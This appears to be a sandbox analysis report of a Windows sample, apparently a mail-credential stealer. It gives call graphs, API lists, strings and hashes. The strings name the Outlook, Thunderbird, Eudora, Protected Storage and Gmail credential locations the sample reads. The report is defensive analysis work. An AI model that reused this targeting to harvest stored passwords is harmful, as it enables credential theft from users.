??3@YAXPAX 33543->33546 33547 409a7c ??3@YAXPAX 33543->33547 33544->33543 33545->33529 33546->33547 33547->33545 33549 407a55 free 33548->33549 33550 409ba5 33549->33550 33551 407a55 free 33550->33551 33552 409bad 33551->33552 33553 407a55 free 33552->33553 33554 409bb5 33553->33554 33555 407a55 free 33554->33555 33556 409bbd 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bd0 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409bda 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409be4 33561->33562 33563 407a1f 4 API calls 33562->33563 33564 409bee 33563->33564 33564->33537 33566 410d0e 2 API calls 33565->33566 33567 410dca 33566->33567 33568 410dfd memset 33567->33568 33607 4070ae 33567->33607 33569 410e1d 33568->33569 33610 410a9c RegOpenKeyExA 33569->33610 33573 401e9e strlen strlen 33573->33441 33573->33442 33574 410e4a 33575 410e7f _mbscpy 33574->33575 33611 410d3d _mbscpy 33574->33611 33575->33573 33577 410e5b 33612 410add RegQueryValueExA 33577->33612 33579 410e73 RegCloseKey 33579->33575 33580->33445 33581->33451 33613 410a9c RegOpenKeyExA 33582->33613 33584 401c4c 33585 401cad 33584->33585 33614 410add RegQueryValueExA 33584->33614 33585->33454 33585->33456 33587 401c6a 33588 401c71 strchr 33587->33588 33589 401ca4 RegCloseKey 33587->33589 33588->33589 33590 401c85 strchr 33588->33590 33589->33585 33590->33589 33591 401c94 33590->33591 33615 406f06 strlen 33591->33615 33593 401ca1 33593->33589 33594->33457 33595->33442 33596->33448 33597->33474 33618 410a9c RegOpenKeyExA 33598->33618 33600 410b34 33601 410b5d 33600->33601 33619 410add RegQueryValueExA 33600->33619 33601->33474 33603 410b4c RegCloseKey 33603->33601 33605->33474 33606->33462 33608 4070bd GetVersionExA 33607->33608 33609 4070ce 33607->33609 33608->33609 33609->33568 33609->33573 33610->33574 33611->33577 33612->33579 33613->33584 33614->33587 33616 406f17 33615->33616 33617 406f1a memcpy 33615->33617 33616->33617 33617->33593 33618->33600 33619->33603 33621 409b40 33620->33621 33623 409b4e 33620->33623 33628 409901 memset SendMessageA 33621->33628 33624 409b99 33623->33624 33625 409b8b 33623->33625 33624->33486 33629 409868 SendMessageA 33625->33629 33627->33482 33628->33623 33629->33624 33630->33489 33632 410807 33631->33632 33633 4107fc FreeLibrary 33631->33633 33632->33491 33633->33632 33635 4107f1 FreeLibrary 33634->33635 33636 403c30 LoadLibraryA 33635->33636 33637 403c74 33636->33637 33638 403c44 GetProcAddress 33636->33638 33639 4107f1 FreeLibrary 33637->33639 33638->33637 33640 403c5e 33638->33640 33641 403c7b 33639->33641 33640->33637 33644 403c6b 33640->33644 33642 404734 3 API calls 33641->33642 33643 403c86 33642->33643 33723 4036e5 33643->33723 33644->33641 33647 4036e5 23 API calls 33648 403c9a 33647->33648 33649 4036e5 23 API calls 33648->33649 33650 403ca4 33649->33650 33651 4036e5 23 API calls 33650->33651 33652 403cae 33651->33652 33733 4085d2 33652->33733 33660 403ce5 33661 403cf7 33660->33661 33914 402bd1 40 API calls 33660->33914 33779 410a9c RegOpenKeyExA 33661->33779 33664 403d0a 33665 403d1c 33664->33665 33915 402bd1 40 API calls 33664->33915 33780 402c5d 33665->33780 33669 4070ae GetVersionExA 33670 403d31 33669->33670 33798 410a9c RegOpenKeyExA 33670->33798 33672 403d51 33673 403d61 33672->33673 33916 402b22 47 API calls 33672->33916 33799 410a9c RegOpenKeyExA 33673->33799 33676 403d87 33679 403d97 33676->33679 33917 402b22 47 API calls 33676->33917 33800 410a9c RegOpenKeyExA 33679->33800 33680 403dbd 33681 403dcd 33680->33681 33918 402b22 47 API calls 33680->33918 33801 410808 33681->33801 33685 404785 FreeLibrary 33686 403de8 33685->33686 33805 402fdb 33686->33805 33689 402fdb 34 API calls 33690 403e00 33689->33690 33821 4032b7 33690->33821 33699 403e3b 33701 403e73 33699->33701 33702 403e46 _mbscpy 33699->33702 33868 40fb00 33701->33868 33920 40f334 334 API calls 33702->33920 33710->33491 33712 404785 FreeLibrary 33711->33712 33713 40473b LoadLibraryA 33712->33713 33714 40474c GetProcAddress 33713->33714 33715 40476e 33713->33715 33714->33715 33716 404764 33714->33716 33717 404781 33715->33717 33718 404785 FreeLibrary 33715->33718 33716->33715 33717->33491 33718->33717 33720 4047a3 33719->33720 33721 404799 FreeLibrary 33719->33721 33720->33491 33721->33720 33722->33493 33724 4036fb 33723->33724 33725 4037c5 33723->33725 33724->33725 33726 403716 strchr 33724->33726 33725->33647 33726->33725 33727 403730 33726->33727 33921 4021b6 memset 33727->33921 33729 40373f _mbscpy _mbscpy strlen 33730 4037a4 _mbscpy 33729->33730 33731 403789 sprintf 33729->33731 33922 4023e5 16 API calls 33730->33922 33731->33730 33734 4085e2 33733->33734 33923 4082cd 11 API calls 33734->33923 33738 408600 33739 403cba 33738->33739 33740 40860b memset 33738->33740 33751 40821d 33739->33751 33926 410b62 RegEnumKeyExA 33740->33926 33742 408637 33743 4086d2 RegCloseKey 33742->33743 33745 40865c memset 33742->33745 33927 410a9c RegOpenKeyExA 33742->33927 33930 410b62 RegEnumKeyExA 33742->33930 33743->33739 33928 410add RegQueryValueExA 33745->33928 33748 408694 33929 40848b 10 API calls 33748->33929 33750 4086ab RegCloseKey 33750->33742 33931 410a9c RegOpenKeyExA 33751->33931 33753 40823f 33754 403cc6 33753->33754 33755 408246 memset 33753->33755 33763 4086e0 33754->33763 33932 410b62 RegEnumKeyExA 33755->33932 33757 4082bf RegCloseKey 33757->33754 33759 40826f 33759->33757 33933 410a9c RegOpenKeyExA 33759->33933 33934 4080ed 11 API calls 33759->33934 33935 410b62 RegEnumKeyExA 33759->33935 33762 4082a2 RegCloseKey 33762->33759 33936 4045db 33763->33936 33768 408737 wcslen 33769 4088ef 33768->33769 33775 40876a 33768->33775 33944 404656 33769->33944 33770 40877a wcsncmp 33770->33775 33772 404734 3 API calls 33772->33775 33773 404785 FreeLibrary 33773->33775 33774 408812 memset 33774->33775 33776 40883c memcpy wcschr 33774->33776 33775->33769 33775->33770 33775->33772 33775->33773 33775->33774 33775->33776 33777 4088c3 LocalFree 33775->33777 33947 40466b _mbscpy 33775->33947 33776->33775 33777->33775 33778 410a9c RegOpenKeyExA 33778->33660 33779->33664 33948 410a9c RegOpenKeyExA 33780->33948 33782 402c7a 33783 402da5 33782->33783 33784 402c87 memset 33782->33784 33783->33669 33949 410b62 RegEnumKeyExA 33784->33949 33786 402d9c RegCloseKey 33786->33783 33787 402cb2 33787->33786 33788 410b1e 3 API calls 33787->33788 33797 402d9a 33787->33797 33953 402bd1 40 API calls 33787->33953 33954 410b62 RegEnumKeyExA 33787->33954 33789 402ce4 memset sprintf 33788->33789 33950 410a9c RegOpenKeyExA 33789->33950 33791 402d28 33792 402d3a sprintf 33791->33792 33951 402bd1 40 API calls 33791->33951 33952 410a9c RegOpenKeyExA 33792->33952 33797->33786 33798->33672 33799->33676 33800->33680 33802 410816 33801->33802 33803 4107f1 FreeLibrary 33802->33803 33804 403ddd 33803->33804 33804->33685 33955 410a9c RegOpenKeyExA 33805->33955 33807 402ff9 33808 403006 memset 33807->33808 33809 40312c 33807->33809 33956 410b62 RegEnumKeyExA 33808->33956 33809->33689 33811 403033 33812 403122 RegCloseKey 33811->33812 33813 410b1e 3 API calls 33811->33813 33816 4030a2 memset 33811->33816 33818 410b62 RegEnumKeyExA 33811->33818 33819 4030f9 RegCloseKey 33811->33819 33959 402db3 26 API calls 33811->33959 33812->33809 33814 403058 memset sprintf 33813->33814 33957 410a9c RegOpenKeyExA 33814->33957 33958 410b62 RegEnumKeyExA 33816->33958 33818->33811 33819->33811 33822 4032d5 33821->33822 33823 4033a9 33821->33823 33960 4021b6 memset 33822->33960 33836 4034e4 memset memset 33823->33836 33825 4032e1 33961 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33825->33961 33827 4032ea 33828 4032f8 memset GetPrivateProfileSectionA 33827->33828 33962 4023e5 16 API calls 33827->33962 33828->33823 33833 40332f 33828->33833 33830 40339b strlen 33830->33823 33830->33833 33832 403350 strchr 33832->33833 33833->33823 33833->33830 33963 4021b6 memset 33833->33963 33964 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33833->33964 33965 4023e5 16 API calls 33833->33965 33837 410b1e 3 API calls 33836->33837 33838 40353f 33837->33838 33839 40357f 33838->33839 33840 403546 _mbscpy 33838->33840 33844 403985 33839->33844 33966 406d55 strlen _mbscat 33840->33966 33842 403565 _mbscat 33967 4033f0 19 API calls 33842->33967 33968 40466b _mbscpy 33844->33968 33846 4039aa 33850 4039ff 33846->33850 33969 40f460 memset memset 33846->33969 33990 40f6e2 33846->33990 34006 4038e8 21 API calls 33846->34006 33851 404785 FreeLibrary 33850->33851 33852 403a0b 33851->33852 33853 4037ca memset memset 33852->33853 34014 444551 memset 33853->34014 33856 4038e2 33856->33699 33919 40f334 334 API calls 33856->33919 33858 40382e 33859 406f06 2 API calls 33858->33859 33860 403843 33859->33860 33861 406f06 2 API calls 33860->33861 33862 403855 strchr 33861->33862 33863 403884 _mbscpy 33862->33863 33864 403897 strlen 33862->33864 33865 4038bf _mbscpy 33863->33865 33864->33865 33866 4038a4 sprintf 33864->33866 34026 4023e5 16 API calls 33865->34026 33866->33865 33869 44b090 33868->33869 33870 40fb10 RegOpenKeyExA 33869->33870 33871 403e7f 33870->33871 33872 40fb3b RegOpenKeyExA 33870->33872 33882 40f96c 33871->33882 33873 40fb55 RegQueryValueExA 33872->33873 33874 40fc2d RegCloseKey 33872->33874 33875 40fc23 RegCloseKey 33873->33875 33876 40fb84 33873->33876 33874->33871 33875->33874 33877 404734 3 API calls 33876->33877 33878 40fb91 33877->33878 33878->33875 33879 40fc19 LocalFree 33878->33879 33880 40fbdd memcpy memcpy 33878->33880 33879->33875 34031 40f802 11 API calls 33880->34031 33883 4070ae GetVersionExA 33882->33883 33884 40f98d 33883->33884 33885 4045db 7 API calls 33884->33885 33893 40f9a9 33885->33893 33886 40fae6 33887 404656 FreeLibrary 33886->33887 33888 403e85 33887->33888 33894 4442ea memset 33888->33894 33889 40fa13 memset WideCharToMultiByte 33890 40fa43 _strnicmp 33889->33890 33889->33893 33891 40fa5b WideCharToMultiByte 33890->33891 33890->33893 33892 40fa88 WideCharToMultiByte 33891->33892 33891->33893 33892->33893 33893->33886 33893->33889 33895 410dbb 9 API calls 33894->33895 33896 444329 33895->33896 34032 40759e strlen strlen 33896->34032 33901 410dbb 9 API calls 33902 444350 33901->33902 33903 40759e 3 API calls 33902->33903 33904 44435a 33903->33904 33905 444212 65 API calls 33904->33905 33906 444366 memset memset 33905->33906 33907 410b1e 3 API calls 33906->33907 33908 4443b9 ExpandEnvironmentStringsA strlen 33907->33908 33909 4443f4 _strcmpi 33908->33909 33910 4443e5 33908->33910 33911 403e91 33909->33911 33912 44440c 33909->33912 33910->33909 33911->33491 33913 444212 65 API calls 33912->33913 33913->33911 33914->33661 33915->33665 33916->33673 33917->33679 33918->33681 33919->33699 33920->33701 33921->33729 33922->33725 33924 40841c 33923->33924 33925 410a9c RegOpenKeyExA 33924->33925 33925->33738 33926->33742 33927->33742 33928->33748 33929->33750 33930->33742 33931->33753 33932->33759 33933->33759 33934->33762 33935->33759 33937 404656 FreeLibrary 33936->33937 33938 4045e3 LoadLibraryA 33937->33938 33939 404651 33938->33939 33940 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33938->33940 33939->33768 33939->33769 33941 40463d 33940->33941 33942 404643 33941->33942 33943 404656 FreeLibrary 33941->33943 33942->33939 33943->33939 33945 403cd2 33944->33945 33946 40465c FreeLibrary 33944->33946 33945->33778 33946->33945 33947->33775 33948->33782 33949->33787 33950->33791 33951->33792 33952->33787 33953->33787 33954->33787 33955->33807 33956->33811 33957->33811 33958->33811 33959->33811 33960->33825 33961->33827 33962->33828 33963->33832 33964->33833 33965->33833 33966->33842 33967->33839 33968->33846 34007 4078ba 33969->34007 33972 4078ba _mbsnbcat 33973 40f5a3 RegOpenKeyExA 33972->33973 33974 40f5c3 RegQueryValueExA 33973->33974 33975 40f6d9 33973->33975 33976 40f6d0 RegCloseKey 33974->33976 33977 40f5f0 33974->33977 33975->33846 33976->33975 33977->33976 33978 40f675 33977->33978 34011 40466b _mbscpy 33977->34011 33978->33976 34012 4012ee strlen 33978->34012 33980 40f611 33982 404734 3 API calls 33980->33982 33987 40f616 33982->33987 33983 40f69e RegQueryValueExA 33983->33976 33984 40f6c1 33983->33984 33984->33976 33985 40f66a 33986 404785 FreeLibrary 33985->33986 33986->33978 33987->33985 33988 40f661 LocalFree 33987->33988 33989 40f645 memcpy 33987->33989 33988->33985 33989->33988 34013 40466b _mbscpy 33990->34013 33992 40f6fa 33993 4045db 7 API calls 33992->33993 33994 40f708 33993->33994 33995 40f7e2 33994->33995 33996 404734 3 API calls 33994->33996 33997 404656 FreeLibrary 33995->33997 34001 40f715 33996->34001 33998 40f7f1 33997->33998 33999 404785 FreeLibrary 33998->33999 34000 40f7fc 33999->34000 34000->33846 34001->33995 34002 40f797 WideCharToMultiByte 34001->34002 34003 40f7b8 strlen 34002->34003 34004 40f7d9 LocalFree 34002->34004 34003->34004 34005 40f7c8 _mbscpy 34003->34005 34004->33995 34005->34004 34006->33846 34008 4078e6 34007->34008 34009 4078c7 _mbsnbcat 34008->34009 34010 4078ea 34008->34010 34009->34008 34010->33972 34011->33980 34012->33983 34013->33992 34027 410a9c RegOpenKeyExA 34014->34027 34016 44458b 34017 40381a 34016->34017 34028 410add RegQueryValueExA 34016->34028 34017->33856 34025 4021b6 memset 34017->34025 34019 4445dc RegCloseKey 34019->34017 34020 4445a4 34020->34019 34029 410add RegQueryValueExA 34020->34029 34022 4445c1 34022->34019 34030 444879 30 API calls 34022->34030 34024 4445da 34024->34019 34025->33858 34026->33856 34027->34016 34028->34020 34029->34022 34030->34024 34031->33879 34033 4075c9 34032->34033 34034 4075bb _mbscat 34032->34034 34035 444212 34033->34035 34034->34033 34052 407e9d 34035->34052 34038 44424d 34039 444274 34038->34039 34040 444258 34038->34040 34060 407ef8 34038->34060 34041 407e9d 9 API calls 34039->34041 34073 444196 52 API calls 34040->34073 34048 4442a0 34041->34048 34043 407ef8 9 API calls 34043->34048 34044 4442ce 34070 407f90 34044->34070 34048->34043 34048->34044 34050 444212 65 API calls 34048->34050 34074 407e62 strcmp strcmp 34048->34074 34049 407f90 FindClose 34051 4442e4 34049->34051 34050->34048 34051->33901 34053 407f90 FindClose 34052->34053 34054 407eaa 34053->34054 34055 406f06 2 API calls 34054->34055 34056 407ebd strlen strlen 34055->34056 34057 407ee1 34056->34057 34058 407eea 34056->34058 34075 4070e3 strlen _mbscat _mbscpy _mbscat 34057->34075 34058->34038 34061 407f03 FindFirstFileA 34060->34061 34062 407f24 FindNextFileA 34060->34062 34065 407f3f 34061->34065 34063 407f46 strlen strlen 34062->34063 34064 407f3a 34062->34064 34067 407f7f 34063->34067 34068 407f76 34063->34068 34066 407f90 FindClose 34064->34066 34065->34063 34065->34067 34066->34065 34067->34038 34076 4070e3 strlen _mbscat _mbscpy _mbscat 34068->34076 34071 407fa3 34070->34071 34072 407f99 FindClose 34070->34072 34071->34049 34072->34071 34073->34038 34074->34048 34075->34058 34076->34067 34077->33505 34078->33509 34079->33517 34080->33515 34081->33516 34082->33520 34083->33514 34429 43ffc8 18 API calls 34243 4281cc 15 API calls __fprintf_l 34431 4383cc 110 API calls __fprintf_l 34244 4275d3 41 API calls 34432 4153d3 22 API calls __fprintf_l 34245 444dd7 _XcptFilter 34437 4013de 15 API calls 34439 425115 111 API calls __fprintf_l 34440 43f7db 18 API calls 34443 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34247 4335ee 16 API calls __fprintf_l 34445 429fef 11 API calls 34248 444deb _exit _c_exit 34446 40bbf0 138 API calls 34251 425115 79 API calls __fprintf_l 34450 437ffa 22 API calls 34255 4021ff 14 API calls 34256 43f5fc 149 API calls 34451 40e381 9 API calls 34258 405983 40 API calls 34259 42b186 27 API calls __fprintf_l 34260 427d86 76 API calls 34261 403585 20 API calls 34263 42e58e 18 API calls __fprintf_l 34266 425115 75 API calls __fprintf_l 34268 401592 8 API calls 33172 410b92 33175 410a6b 33172->33175 33174 410bb2 33176 410a77 33175->33176 33177 410a89 GetPrivateProfileIntA 33175->33177 33180 410983 memset _itoa WritePrivateProfileStringA 33176->33180 33177->33174 33179 410a84 33179->33174 33180->33179 34455 434395 16 API calls 34270 441d9c memcmp 34457 43f79b 119 API calls 34271 40c599 43 API calls 34458 426741 87 API calls 34275 4401a6 21 API calls 34277 426da6 memcpy memset memset memcpy 34278 4335a5 15 API calls 34280 4299ab memset memset memcpy memset memset 34281 40b1ab 8 API calls 34463 425115 76 API calls __fprintf_l 34467 4113b2 18 API calls 2 library calls 34471 40a3b8 memset sprintf SendMessageA 34084 410bbc 34087 4109cf 34084->34087 34088 4109dc 34087->34088 34089 410a23 memset GetPrivateProfileStringA 34088->34089 34090 4109ea memset 34088->34090 34095 407646 strlen 34089->34095 34100 4075cd sprintf memcpy 34090->34100 34093 410a0c WritePrivateProfileStringA 34094 410a65 34093->34094 34096 40765a 34095->34096 34097 40765c 34095->34097 34096->34094 34099 4076a3 34097->34099 34101 40737c strtoul 34097->34101 34099->34094 34100->34093 34101->34097 34283 40b5bf memset memset _mbsicmp

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040832F
                                                                                                    • memset.MSVCRT ref: 00408343
                                                                                                    • memset.MSVCRT ref: 0040835F
                                                                                                    • memset.MSVCRT ref: 00408376
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                    • strlen.MSVCRT ref: 004083E9
                                                                                                    • strlen.MSVCRT ref: 004083F8
                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                    • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                    • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 455 407f3f-407f44 451->455 453 407f46-407f74 strlen * 2 452->453 454 407f3a call 407f90 452->454 458 407f83 453->458 459 407f76-407f81 call 4070e3 453->459 454->455 455->453 457 407f89-407f8f 455->457 461 407f86-407f88 458->461 459->461 461->457
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                                                    • strlen.MSVCRT ref: 00407F64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                    • String ID: ACD
                                                                                                    • API String ID: 379999529-620537770
                                                                                                    • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                    • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                    • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                    • memset.MSVCRT ref: 00402018
                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                    • API String ID: 1846531875-4223776976
                                                                                                    • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                    • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                    • API String ID: 745651260-375988210
                                                                                                    • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                    • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
